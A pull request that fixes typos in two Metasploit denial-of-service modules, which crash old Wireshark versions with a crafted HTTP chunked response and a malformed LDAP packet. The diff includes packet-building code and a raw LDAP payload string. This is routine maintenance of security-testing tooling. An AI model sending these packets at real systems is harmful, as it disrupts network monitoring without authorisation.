### PR TITLE
Fixed few minor typos - auxiliary/dos/wireshark/ldap.rb, chunked.rb

### DIFF
--- a/modules/auxiliary/dos/wireshark/chunked.rb
+++ b/modules/auxiliary/dos/wireshark/chunked.rb
@@ -17,13 +17,13 @@ class MetasploitModule < Msf::Auxiliary
         Wireshark crash when dissecting an HTTP chunked response.
         Versions affected: 0.99.5 (Bug 1394)
       },
-      'Author' 	=> [ 'Matteo Cantoni <goony[at]nothink.org>' ],
+      'Author' 	=> ['Matteo Cantoni <goony[at]nothink.org>'],
       'License'       => MSF_LICENSE,
       'References'    =>
         [
-          [ 'CVE', '2007-3389'],
-          [ 'OSVDB', '37643'],
-          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
+          ['CVE', '2007-3389'],
+          ['OSVDB', '37643'],
+          ['URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
         ],
       'DisclosureDate' => 'Feb 22 2007'))
 
@@ -42,13 +42,13 @@ class MetasploitModule < Msf::Auxiliary
 
     p = PacketFu::TCPPacket.new
     p.ip_saddr = datastore['SHOST'] || Rex::Socket.source_address(rhost)
-    p.ip_daddr = dhost
+    p.ip_daddr = rhost
     p.tcp_dport = rand(65535)+1
-    n.tcp_ack = rand(0x100000000)
+    p.tcp_ack = rand(0x100000000)
     p.tcp_flags.psh = 1
     p.tcp_flags.ack = 1
     p.tcp_sport = datastore['SPORT'].to_i
-    p.tcp_window = 3072
+    p.tcp_win = 3072
 
     # The following hex blob contains an HTTP response with a chunked-encoding
     # length of 0. The ASCII version is below in a block comment.

--- a/modules/auxiliary/dos/wireshark/ldap.rb
+++ b/modules/auxiliary/dos/wireshark/ldap.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
     p.tcp_flags.syn = 1
     p.tcp_flags.ack = 1
     p.tcp_dport = datastore['RPORT'].to_i
-    p.tcp_window = 3072
+    p.tcp_win = 3072
     p.payload = "0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016"
     p.recalc
     capture_sendto(p, rhost)


### PR DESCRIPTION
This PR fixes few minor typos due to an old commit "**Removes all instances of Racket objects, as far as I can…**" https://github.com/rapid7/metasploit-framework/commit/c54e18d7579fc301a333a221f47bb3534de7476f


